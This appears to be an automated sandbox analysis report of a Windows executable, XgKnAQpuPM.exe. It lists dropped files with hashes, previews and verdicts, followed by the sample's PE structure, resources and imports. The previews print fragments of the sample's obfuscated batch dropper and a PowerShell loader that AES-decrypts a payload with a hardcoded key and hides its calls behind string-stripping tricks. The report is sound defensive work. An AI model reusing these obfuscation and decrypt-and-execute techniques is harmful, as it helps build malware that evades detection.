                            SHA1:59F22F039975B297EEEC92F5069FAA63B41F0407
                            SHA-256:AF0EADCEA5A99809629843BE9CB635186DBFE57D592C6D6ECFF55E4C70106D8A
                            SHA-512:925A62A9FE1629A3E65F546AF070BEB6812E8DBBBD46E56C3B3D6EB3109F05DA6E1EF4BCB9995C2C245D377FACC758F950B23C5787FDC5DAA7BF128E385E8E0D
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... ........`.g........................h&..........\3..p1......................`.......8...........T............Z..`............d...........f..............................................................................eJ......Pg......Lw......................T............`.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB12E.tmp.WERInternalMetadata.xml

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8766
                            Entropy (8bit):3.69397161896257
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJv+jt6YRDShgmfZa72pWE+89bnjnrfppNm:R6lXJGJ6Y1ShgmfQ7gnjrfpK
                            MD5:1E308375DD2055C9E8698DF3F4AD3B9B
                            SHA1:75D4BD0AF8CFB93E253DC91CE56B92B0875A6310
                            SHA-256:8FBFC72B648A334BEA20117B1F179165B68154ADD818BA3EB8CDE12AC6AD16B1
                            SHA-512:317DA11F0BDF5C7A7338BFED46A2AC90AE2DB96B83E91D4E922AC11DE36410919BFF220C9AE37C2EF164C646D0FEDBBB9E9269884B3260321DD4116E26A4ED19
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.5.2.<./.P.i.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB17D.tmp.xml

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.44038908323831
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsVJg771I9hjHyWpW8VYTYm8M4JQ91FKyq8vlpytf3d:uIjfvI7CH7VXJQAWLuf3d
                            MD5:9B3CCF41CC43AE59F126D6434B924BD5
                            SHA1:C107A450CC6F6F6965EE3CB31838A5324711D56F
                            SHA-256:C3928A0EA3F708941C0B5A049860B1D58C11FCD6D90354ABF0E05455EC2FD891
                            SHA-512:0FDA21B712D220386227DB4AAB461B13A778A7DA9F63595D44889858BF1F1364309EC34B4A2AEF5A337695AAC0361A31738C95049780BC09EF6FC1FFEE8D6DFC
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533611" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2824
                            Entropy (8bit):5.4156429020514745
                            Encrypted:false
                            SSDEEP:48:KizsSU4y4RQmFoUL5a+m9qr9t5/78NdgxJZKaVEouYAgwd64rHLjtvz:KizlHyIFKEg9qrh7KYJ5Eo9Adrxz
                            MD5:A1FE3978A33AC854ACEE2B97BBF646BC
                            SHA1:DD8B8BE6A95FA84A99D26FA9434A2B95D8994D0B
                            SHA-256:A1F8CF3444E28114ED9E0B74D10FC8CEB4E2BFC679A9E25781938F7B1278C698
                            SHA-512:F90E27917E57169F2B21F45606F237B98EC418111004457D26B61AB5F08A410E5D235607C852B31FA4C11C0D832FDE3A920183E7C534506DC20C96387BA55AF3
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat

                            Download File
                            Process:C:\Users\user\Desktop\XgKnAQpuPM.exe
                            File Type:DOS batch file, ASCII text, with very long lines (5451), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5120251
                            Entropy (8bit):6.031755508710794
                            Encrypted:false
                            SSDEEP:49152:OH8Afj+WOC91s9ol40FVOy9TAJ2/mGRjOQQZxViXKmxf6B7QsD:d
                            MD5:48091A17649D5BE43A163572BF795E92
                            SHA1:2106B9B38666363ED69168497514401BBC81736B
                            SHA-256:31BB62F0E9E7513EF0B83AA8BD21BDA89E654A768C8EEC896A075BE4217C9541
                            SHA-512:7EC98B3AFC1E27095E8430BFBACFA355A83A89DB920DA95BE5D509115F2096D2A9C5FB148BCA603F58362D0820E1536445E962FFB76365FE54E966D0586D851B
                            Malicious:true
                            Preview:@echo off..%^%@%TseMjTlumHyGzrvFzgHkoUqYjWINsRaoSduNkGicRDLmMrgqxboiCMvYcfDmkycvGkOvWIuTYEsKjemRQsprCRMgIwKfcVRtBqFCDLuPGukXtKPYTMwSiKSOyINAXpQdNZjSyKoeYAKhHOMXGMlqyZkQxQdVYURrEhktBWzjxsUIaKhJVPTlezENPs%%^%e%IGtgeItDAEtwJmcTgfCQMJtZjaGmeCwDiBRCdmQZGhGfBsjYcGyImCIZmtWdcgzYhPohvzPUpCjFcoyQQIkxdOqFTSpJpMXzIIXMdcDCQEsKscWYVgntVbUtyJoDjgFCFKXurMNOfHHzvGnQVrNizDDHNEnuOZtKZ%%^%c%eIfCGjsyontvXRwxHRswdbgpGNytafoWzFCELtKEQaopnsGvYqsBsDMcCPVTLZyjZxVspRMnhNFdNQcogcuJMNEVTzcVyRTQBfqQwoghEeuEXJpMMHNIEPwlSZzPOQPqUOBHzmRSVneItaYjkqiQekmMIfXwOrsOodJjhImAPUMrKORRbpEyIYmKCOYtoveEVqtpr%%^%h%cCdIbjyVcUoguzMUgqRZGtJTltQivtuBAmncuZXclHMdfiaERbkdxriISkxHtqzIAMGhlKzgsPNZGFNctlqujrdieEjkCpIVidDsCTshBeKIEicnwuoiZeyiIxcHApEdhRRCbvAASjSfGvEVCWNhbAWdEuKeQLGmAHBMrzlbTOpQltCnThfEBwcGVNYHKwJhCGF%%^%o%UREdLMnmlgRlSxlJFbKdFUQEBEqxehnFODsbDcTPiPvPVMOnlaBBVBtZbZBhvQidSmwpejgDiVVQzbIOPcmdFMJnjsaDALtsGrWJpzjbUYsZFDAZrNrsDexgCjfMjCdwBDjheZyqTljHtKHGRamMubOCUPgguwSrVVxcttUrpbysVQNSCyUiqqcAOHmoSsWwsRLxmFmyfUxsCwGdcoEVC%%^% %bF

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uljnmqgm.t34.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yeoev2sh.3ro.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\appcompat\Programs\Amcache.hve

                            Download File
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.373043305953581
                            Encrypted:false
                            SSDEEP:6144:4FVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:AV1qyWWI/glMM6kF7Pq
                            MD5:5DAB9691BE7C220324D5551D8BFBCD4B
                            SHA1:350A242B6709F15D703ECD6A26F5F6F93DEEDC88
                            SHA-256:A54D9354AB7CD2A0F58332D960EF4B5E9D573883044ABED9C8C0CE849855D33E
                            SHA-512:3330667C4D923E0FD5EF7C779E05B154A0717206252C3A2283AA43FD419DFA7E28948E22C1BC53052CD53561CA242A2DF24D539D93C2CC548BC7AFACF89CF061
                            Malicious:false
                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^xXV.................................................................................................................................................................................................................................................................................................................................................;Ob........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            \Device\Null

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (2734), with CRLF, LF line terminators
                            Category:dropped
                            Size (bytes):3274
                            Entropy (8bit):5.418461420911021
                            Encrypted:false
                            SSDEEP:96:PFHDRfj+87GBzBCxI4kB595f8bymr3DP3lQEifiOj8l2:PvalMI4kB595fi3DPDifiOb
                            MD5:B7D335FB15C206BB25296DAC175C70B5
                            SHA1:A36747AF15236F95C768C42327CC5DCAD9982EFD
                            SHA-256:767A7C28A499E2029D76314C77D1B744D544F27E1B9D682A9673B8A3DDF7F017
                            SHA-512:C22DA90301859AE3F057CCA1E7D31946F43C65BC741AA7A77E4233946F0178DC60CD8B112425AF8B3C72877336B7826174A76CBC0C8E0B2E760CDCA338943085
                            Malicious:false
                            Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\AppData\Local\Temp\IXP000.TMP> function FpxON($kXGHT){.$MjRuR=[System.Security.Cryptography.Aes]::Create();.$MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU=');.$MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ==');.$WVvmF=$MjRuR.CreateDecryptor();.$CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length);.$WVvmF.Dispose();.$MjRuR.Dispose();.$CVTyC;}function ogptr($kXGHT){.Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', '');.Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.Mblckeblckmblcko

                            Static File Info

                            General

                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):7.979186304025851
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:XgKnAQpuPM.exe
                            File size:3'571'712 bytes
                            MD5:52c1acdcbb715dd099648b26b98254e8
                            SHA1:e3cd07adc9d8fe7c2fbb07730845af6555af2e66
                            SHA256:8dc774bd289aeb18dee994fea6e69039d9c6e77a1b90a0d9db004109735ef3f9
                            SHA512:cb1890dc136ae86c6ae8110fa026eb23b77b580345c8e7f47cf7233f888e5d729dfad8519c4c8c330eb2d4ed6a7209739d46fb19853e0d6ea13d595b43a3d24a
                            SSDEEP:98304:5M9/CPPgsG6SHkwvbyQsJFV5Z1QvI69gA5PlVkhh9:5MhOPy6SHxy1VbrKgAXy
                            TLSH:6AF5334957F660D2E0AE1331C99745C74E32B9620F39489B43E948BF2B733C4A171FAA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"

                            File Icon

                            Icon Hash:3b6120282c4c5a1f

                            Static PE Info

                            General

                            Entrypoint:0x140008460
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:10
                            OS Version Minor:0
                            File Version Major:10
                            File Version Minor:0
                            Subsystem Version Major:10
                            Subsystem Version Minor:0
                            Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                            Entrypoint Preview

                            Instruction
                            dec eax
                            sub esp, 28h
                            call 00007F6C0CFE1AC0h
                            dec eax
                            add esp, 28h
                            jmp 00007F6C0CFE133Bh
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            dec eax
                            mov dword ptr [esp+08h], ebx
                            dec eax
                            mov dword ptr [esp+10h], edi
                            inc ecx
                            push esi
                            dec eax
                            sub esp, 000000B0h
                            and dword ptr [esp+20h], 00000000h
                            dec eax
                            lea ecx, dword ptr [esp+40h]
                            call dword ptr [00000F8Dh]
                            nop
                            dec eax
                            mov eax, dword ptr [00000030h]
                            dec eax
                            mov ebx, dword ptr [eax+08h]
                            xor edi, edi
                            xor eax, eax
                            dec eax
                            cmpxchg dword ptr [000046C2h], ebx
                            je 00007F6C0CFE133Ch
                            dec eax
                            cmp eax, ebx
                            jne 00007F6C0CFE134Fh
                            mov edi, 00000001h
                            mov eax, dword ptr [000046B8h]
                            cmp eax, 01h
                            jne 00007F6C0CFE134Ch
                            lea ecx, dword ptr [eax+1Eh]
                            call 00007F6C0CFE1953h
                            jmp 00007F6C0CFE13B9h
                            mov ecx, 000003E8h
                            call dword ptr [00000F3Bh]
                            jmp 00007F6C0CFE12F6h
                            mov eax, dword ptr [00004693h]
                            test eax, eax
                            jne 00007F6C0CFE1395h
                            mov dword ptr [00004685h], 00000001h
                            dec esp
                            lea esi, dword ptr [000011BEh]
                            dec eax
                            lea ebx, dword ptr [0000119Fh]
                            dec eax
                            mov dword ptr [esp+30h], ebx
                            mov dword ptr [esp+24h], eax
                            dec ecx
                            cmp ebx, esi
                            jnc 00007F6C0CFE1361h
                            test eax, eax
                            jne 00007F6C0CFE1361h
                            dec eax
                            cmp dword ptr [ebx], 00000000h
                            je 00007F6C0CFE134Ch
                            dec ecx
                            mov edx, 5E523070h

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa2b40xb4.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x358bcc.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x42c.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3680000x2c.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x9a680x54.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x138.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x91480x520.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x7e400x8000d22d8a48c14d2185814d2ed24fb0aed1False0.546173095703125data6.092855112591348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x90000x23400x30003748ff8966297360bdba725e2d585c23False0.318359375data3.84344715350442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xc0000x1f000x1000f198899505f620007167379f74f8141cFalse0.083251953125data1.0384025678015962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata0xe0000x42c0x10002d9ecb32a70228f2b07b654e216a79eeFalse0.156005859375data1.4378876073270839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0xf0000x3590000x359000bf7df857719ee06de74c7dc0e33f055cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x3680000x2c0x1000cf22972a59e8c2a2ad0453d649f2025dFalse0.017578125data0.10781936458684958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                            RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                            RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                            RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                            RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                            RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                            RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                            RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                            RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                            RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                            RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                            RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                            RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                            RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                            RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                            RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                            RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                            RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                            RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                            RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                            RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                            RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                            RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                            RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                            RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                            RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                            RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                            RT_RCDATA0x298700x33d638Microsoft Cabinet archive data, Windows 2000/XP setup, 3397176 bytes, 1 file, at 0x2c +A "vclib.bat", ID 885, number 1, 157 datablocks, 0x1503 compressionEnglishUnited States0.9999542236328125
                            RT_RCDATA0x366ea80x4dataEnglishUnited States3.0
                            RT_RCDATA0x366eac0x24dataEnglishUnited States0.8611111111111112
                            RT_RCDATA0x366ed00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                            RT_RCDATA0x366ed80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                            RT_RCDATA0x366ee00x4dataEnglishUnited States3.0
                            RT_RCDATA0x366ee40x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                            RT_RCDATA0x366eec0x4dataEnglishUnited States3.0
                            RT_RCDATA0x366ef00x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                            RT_RCDATA0x366f040x4dataEnglishUnited States3.0
                            RT_RCDATA0x366f080x6dataEnglishUnited States2.3333333333333335
                            RT_RCDATA0x366f100x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                            RT_RCDATA0x366f180x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                            RT_GROUP_ICON0x366f200xbcdataEnglishUnited States0.6117021276595744
                            RT_VERSION0x366fdc0x408dataEnglishUnited States0.42248062015503873
                            RT_MANIFEST0x3673e40x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                            Imports

                            DLLImport
                            ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                            KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                            GDI32.dllGetDeviceCaps
